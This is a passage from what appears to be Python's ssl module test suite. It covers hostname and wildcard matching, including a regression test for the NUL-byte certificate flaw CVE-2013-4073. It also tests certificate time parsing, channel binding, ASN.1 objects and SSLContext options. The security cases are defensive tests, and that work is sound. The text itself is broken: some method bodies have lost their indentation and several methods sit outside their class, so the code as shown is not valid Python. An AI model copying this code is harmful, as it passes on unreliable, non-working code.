                    certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
    def test_empty_cert(self):
        """Wrapping with an empty cert file"""
        self.bad_cert_test("nullcert.pem")

    def test_malformed_cert(self):
        """Wrapping with a badly formatted certificate (syntax error)"""
        self.bad_cert_test("badcert.pem")

    def test_malformed_key(self):
        """Wrapping with a badly formatted key (syntax error)"""
        self.bad_cert_test("badkey.pem")
    def test_match_hostname(self):
        # Exhaustive checks of ssl.match_hostname(): commonName and
        # subjectAltName matching, wildcard rules, NUL-byte handling
        # (CVE-2013-4073), IDNA labels, IP entries, and DoS limits.
        def ok(cert, hostname):
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)

        # -- Hostname matching --

        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')

        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        # only match one left-most wildcard
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')

        # NULL bytes are bad, CVE-2013-4073
        cert = {'subject': ((('commonName',
                              'null.python.org\x00example.org'),),)}
        ok(cert, 'null.python.org\x00example.org') # or raise an error?
        fail(cert, 'example.org')
        fail(cert, 'null.python.org')

        # error cases with wildcards
        cert = {'subject': ((('commonName', '*.*.a.com'),),)}
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        fail(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')

        # wildcard doesn't match IDNA prefix 'xn--'
        idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, idna)
        cert = {'subject': ((('commonName', 'x*.python.org'),),)}
        fail(cert, idna)
        cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
        fail(cert, idna)

        # wildcard in first fragment and  IDNA A-labels in sequent fragments
        # are supported.
        idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
        ok(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
        fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
        fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))

        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')

        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')

        # -- IPv4 matching --
        cert = {'subject': ((('commonName', 'example.com'),),),
                'subjectAltName': (('DNS', 'example.com'),
                                   ('IP Address', '10.11.12.13'),
                                   ('IP Address', '14.15.16.17'))}
        ok(cert, '10.11.12.13')
        ok(cert, '14.15.16.17')
        fail(cert, '14.15.16.18')
        fail(cert, 'example.net')

        # -- IPv6 matching --
        cert = {'subject': ((('commonName', 'example.com'),),),
                'subjectAltName': (('DNS', 'example.com'),
                                   ('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
                                   ('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
        ok(cert, '2001::cafe')
        ok(cert, '2003::baba')
        fail(cert, '2003::bebe')
        fail(cert, 'example.net')

        # -- Miscellaneous --

        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')

        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')

        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')

        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')

        # Issue #17980: avoid denials of service by refusing more than one
        # wildcard per fragment.
        cert = {'subject': ((('commonName', 'a*b.com'),),)}
        ok(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b.co*'),),)}
        fail(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b*.com'),),)}
        with self.assertRaises(ssl.CertificateError) as cm:
            ssl.match_hostname(cert, 'axxbxxc.com')
        self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
    """get_channel_binding() must raise ValueError for an unknown type.

    All three sockets are managed by context managers so they are closed
    even when an assertion fails; the original closed the listening
    socket only after the checks, leaking it on failure.
    """
    with socket.socket(socket.AF_INET) as s:
        s.bind(('127.0.0.1', 0))
        s.listen()
        with socket.socket(socket.AF_INET) as c:
            c.connect(s.getsockname())
            # no handshake needed: the binding-type check happens first
            with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
                with self.assertRaises(ValueError):
                    ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                     "'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
    """An unconnected SSLSocket returns None for a known binding type."""
    # client-style socket
    sock = socket.socket(socket.AF_INET)
    with ssl.wrap_socket(sock) as wrapped:
        self.assertIsNone(wrapped.get_channel_binding("tls-unique"))
    # a server-side socket behaves the same way
    sock = socket.socket(socket.AF_INET)
    with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as wrapped:
        self.assertIsNone(wrapped.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
    # Dropping the last reference to an open SSLSocket must emit a
    # ResourceWarning whose message contains the socket's repr.
    ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
    r = repr(ss)  # capture the repr before the object is destroyed
    with self.assertWarns(ResourceWarning) as cm:
        ss = None             # drop the only reference
        support.gc_collect()  # force collection on non-refcounting VMs
    self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
    """get_default_verify_paths() yields a 6-field named tuple and
    honours the SSL_CERT_DIR / SSL_CERT_FILE environment overrides."""
    default = ssl.get_default_verify_paths()
    self.assertEqual(len(default), 6)
    self.assertIsInstance(default, ssl.DefaultVerifyPaths)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_DIR"] = CAPATH
        env["SSL_CERT_FILE"] = CERTFILE
        overridden = ssl.get_default_verify_paths()
        self.assertEqual(overridden.cafile, CERTFILE)
        self.assertEqual(overridden.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
    """ssl.enum_certificates() enumerates the Windows system cert stores
    as (cert_bytes, encoding, trust) triples."""
    self.assertTrue(ssl.enum_certificates("CA"))
    self.assertTrue(ssl.enum_certificates("ROOT"))
    self.assertRaises(TypeError, ssl.enum_certificates)
    self.assertRaises(WindowsError, ssl.enum_certificates, "")
    trust_oids = set()
    for store_name in ("CA", "ROOT"):
        entries = ssl.enum_certificates(store_name)
        self.assertIsInstance(entries, list)
        for entry in entries:
            self.assertIsInstance(entry, tuple)
            self.assertEqual(len(entry), 3)
            cert, encoding, trust = entry
            self.assertIsInstance(cert, bytes)
            self.assertIn(encoding, {"x509_asn", "pkcs_7_asn"})
            # trust is either a set of OID strings or a bool
            self.assertIsInstance(trust, (set, bool))
            if isinstance(trust, set):
                trust_oids.update(trust)
    # at least one store entry should be trusted for server auth
    serverAuth = "1.3.6.1.5.5.7.3.1"
    self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
    """ssl.enum_crls() lists (crl_bytes, encoding) pairs from a Windows
    certificate store."""
    self.assertTrue(ssl.enum_crls("CA"))
    self.assertRaises(TypeError, ssl.enum_crls)
    self.assertRaises(WindowsError, ssl.enum_crls, "")
    crls = ssl.enum_crls("CA")
    self.assertIsInstance(crls, list)
    for entry in crls:
        self.assertIsInstance(entry, tuple)
        self.assertEqual(len(entry), 2)
        self.assertIsInstance(entry[0], bytes)
        self.assertIn(entry[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
    # _ASN1Object wraps an OpenSSL ASN.1 object as a 4-tuple of
    # (nid, shortname, longname, oid); 129 is OpenSSL's NID for the
    # serverAuth extended key usage.
    expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                '1.3.6.1.5.5.7.3.1')
    val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
    self.assertEqual(val, expected)
    self.assertEqual(val.nid, 129)
    self.assertEqual(val.shortname, 'serverAuth')
    self.assertEqual(val.longname, 'TLS Web Server Authentication')
    self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
    self.assertIsInstance(val, ssl._ASN1Object)
    # the constructor accepts only dotted OID strings, not names
    self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
    # lookup by numeric NID
    val = ssl._ASN1Object.fromnid(129)
    self.assertEqual(val, expected)
    self.assertIsInstance(val, ssl._ASN1Object)
    self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
    with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
        ssl._ASN1Object.fromnid(100000)
    # every NID that resolves must expose well-typed attributes
    for i in range(1000):
        try:
            obj = ssl._ASN1Object.fromnid(i)
        except ValueError:
            pass
        else:
            self.assertIsInstance(obj.nid, int)
            self.assertIsInstance(obj.shortname, str)
            self.assertIsInstance(obj.longname, str)
            self.assertIsInstance(obj.oid, (str, type(None)))
    # lookup by long name, short name or OID string (case sensitive)
    val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
    self.assertEqual(val, expected)
    self.assertIsInstance(val, ssl._ASN1Object)
    self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
    self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
                     expected)
    with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
        ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
    """ssl.Purpose members are _ASN1Object instances carrying the
    expected extended-key-usage NIDs and OIDs."""
    server_auth = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
    self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
    self.assertEqual(ssl.Purpose.SERVER_AUTH, server_auth)
    self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
    self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
    self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
                     '1.3.6.1.5.5.7.3.1')

    client_auth = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
    self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
    self.assertEqual(ssl.Purpose.CLIENT_AUTH, client_auth)
    self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
    self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
    self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
                     '1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
    """Wrapping a datagram socket is rejected: only stream sockets are
    supported (no DTLS)."""
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.addCleanup(udp_sock.close)
    # module-level helper
    with self.assertRaises(NotImplementedError) as cx:
        ssl.wrap_socket(udp_sock, cert_reqs=ssl.CERT_NONE)
    self.assertEqual(str(cx.exception), "only stream sockets are supported")
    # SSLContext method behaves identically
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    with self.assertRaises(NotImplementedError) as cx:
        ctx.wrap_socket(udp_sock)
    self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
    """Helper: *timestring* must parse to exactly *timestamp*."""
    parsed = ssl.cert_time_to_seconds(timestring)
    self.assertEqual(parsed, timestamp)
def cert_time_fail(self, timestring):
    """Helper: parsing *timestring* must raise ValueError."""
    self.assertRaises(ValueError, ssl.cert_time_to_seconds, timestring)
@unittest.skipUnless(utc_offset(),
                     'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
    """Issue #19940: cert_time_to_seconds() must be independent of the
    local timezone (dates are always interpreted as GMT)."""
    cases = (
        ("May 9 00:00:00 2007 GMT", 1178668800.0),
        ("Jan 5 09:34:43 2018 GMT", 1515144883.0),
    )
    for timestring, timestamp in cases:
        self.cert_time_ok(timestring, timestamp)
def test_cert_time_to_seconds(self):
    # Reference date used by most of the checks below.
    timestring = "Jan 5 09:34:43 2018 GMT"
    ts = 1515144883.0
    self.cert_time_ok(timestring, ts)
    # accept keyword parameter, assert its name
    self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
    # accept both %e and %d (space or zero generated by strftime)
    self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
    # case-insensitive
    self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
    # malformed inputs must raise ValueError (see cert_time_fail)
    self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
    self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
    self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
    self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
    self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
    self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
    self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
    newyear_ts = 1230768000.0
    # leap seconds
    self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
    # same timestamp
    self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
    self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
    # allow 60th second (even if it is not a leap second)
    self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
    # allow 2nd leap second for compatibility with time.strptime()
    self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
    self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
    # no special treatment for the special value:
    # 99991231235959Z (rfc 5280)
    self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
    # `cert_time_to_seconds()` should be locale independent
    def local_february_name():
        # struct_time for Feb 1st; only the month field (index 1) matters
        return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
    if local_february_name().lower() == 'feb':
        self.skipTest("locale-specific month name needs to be "
                      "different from C locale")
    # locale-independent: the C-locale month name always parses...
    self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
    # ...while the localized month name must be rejected
    self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
    # connect_ex() on an SSL socket must report a failed TCP connection
    # through its return value instead of raising.
    server = socket.socket(socket.AF_INET)
    self.addCleanup(server.close)
    port = support.bind_port(server) # Reserve port but don't listen
    s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                        cert_reqs=ssl.CERT_REQUIRED)
    self.addCleanup(s.close)
    rc = s.connect_ex((HOST, port))
    # Issue #19919: Windows machines or VMs hosted on Windows
    # machines sometimes return EWOULDBLOCK.
    errors = (
        errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
        errno.EWOULDBLOCK,
    )
    self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
    """Tests for ssl.SSLContext: construction, protocol/options/verify
    settings, certificate, key, CA and DH parameter loading, SNI
    callbacks, and the create_default_context()/_create_stdlib_context()
    factory functions."""

    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        # every known protocol constant is accepted...
        for protocol in PROTOCOLS:
            ssl.SSLContext(protocol)
        # ...the argument is mandatory and must be a known constant
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)

    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        # the protocol attribute reflects the constructor argument
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)

    def test_ciphers(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        # a cipher string matching nothing raises SSLError
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")

    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        ctx.options |= ssl.OP_NO_TLSv1
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
                         ctx.options)
        if can_clear_options():
            # newer OpenSSL allows clearing previously-set option bits
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0

    def test_verify_mode(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # only the CERT_* integer constants are accepted
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42

    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_verify_flags(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # default value
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
        ctx.verify_flags = ssl.VERIFY_DEFAULT
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # supports any value
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
        self.assertEqual(ctx.verify_flags,
                         ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
        with self.assertRaises(TypeError):
            ctx.verify_flags = None

    def test_load_cert_chain(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE, keyfile=None)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(OSError) as cm:
            ctx.load_cert_chain(NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
        # Password protected key and cert
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=bytearray(KEY_PASSWORD.encode()))
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                            bytearray(KEY_PASSWORD.encode()))
        with self.assertRaisesRegex(TypeError, "should be a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # openssl has a fixed limit on the password buffer.
            # PEM_BUFSIZE is generally set to 1kb.
            # Return a string larger than this.
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
        # Password callback
        def getpass_unicode():
            return KEY_PASSWORD
        def getpass_bytes():
            return KEY_PASSWORD.encode()
        def getpass_bytearray():
            return bytearray(KEY_PASSWORD.encode())
        def getpass_badpass():
            return "badpass"
        def getpass_huge():
            return b'a' * (1024 * 1024)
        def getpass_bad_type():
            return 9
        def getpass_exception():
            raise Exception('getpass error')
        class GetPassCallable:
            def __call__(self):
                return KEY_PASSWORD
            def getpass(self):
                return KEY_PASSWORD
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=GetPassCallable().getpass)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
        with self.assertRaisesRegex(TypeError, "must return a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
        with self.assertRaisesRegex(Exception, "getpass error"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
        # Make sure the password function isn't called if it isn't needed
        ctx.load_cert_chain(CERTFILE, password=getpass_exception)

    def test_load_verify_locations(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
        with self.assertRaises(OSError) as cm:
            ctx.load_verify_locations(NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)

    def test_load_verify_cadata(self):
        # test cadata
        with open(CAFILE_CACERT) as f:
            cacert_pem = f.read()
        cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
        with open(CAFILE_NEURONIO) as f:
            neuronio_pem = f.read()
        neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
        # test PEM
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
        ctx.load_verify_locations(cadata=cacert_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = "\n".join((cacert_pem, neuronio_pem))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # with junk around the certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = ["head", cacert_pem, "other", neuronio_pem, "again",
                    neuronio_pem, "tail"]
        ctx.load_verify_locations(cadata="\n".join(combined))
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # test DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(cadata=cacert_der)
        ctx.load_verify_locations(cadata=neuronio_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=cacert_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = b"".join((cacert_der, neuronio_der))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # error cases
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
        with self.assertRaisesRegex(ssl.SSLError, "no start line"):
            ctx.load_verify_locations(cadata="broken")
        with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
            ctx.load_verify_locations(cadata=b"broken")

    def test_load_dh_params(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_dh_params(DHFILE)
        if os.name != 'nt':
            # bytes paths are not supported on Windows here
            ctx.load_dh_params(BYTES_DHFILE)
        self.assertRaises(TypeError, ctx.load_dh_params)
        self.assertRaises(TypeError, ctx.load_dh_params, None)
        with self.assertRaises(FileNotFoundError) as cm:
            ctx.load_dh_params(NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        # a certificate file is not valid DH parameters
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)

    @skip_if_broken_ubuntu_ssl
    def test_session_stats(self):
        # a fresh context starts with all session counters at zero
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.session_stats(), {
                'number': 0,
                'connect': 0,
                'connect_good': 0,
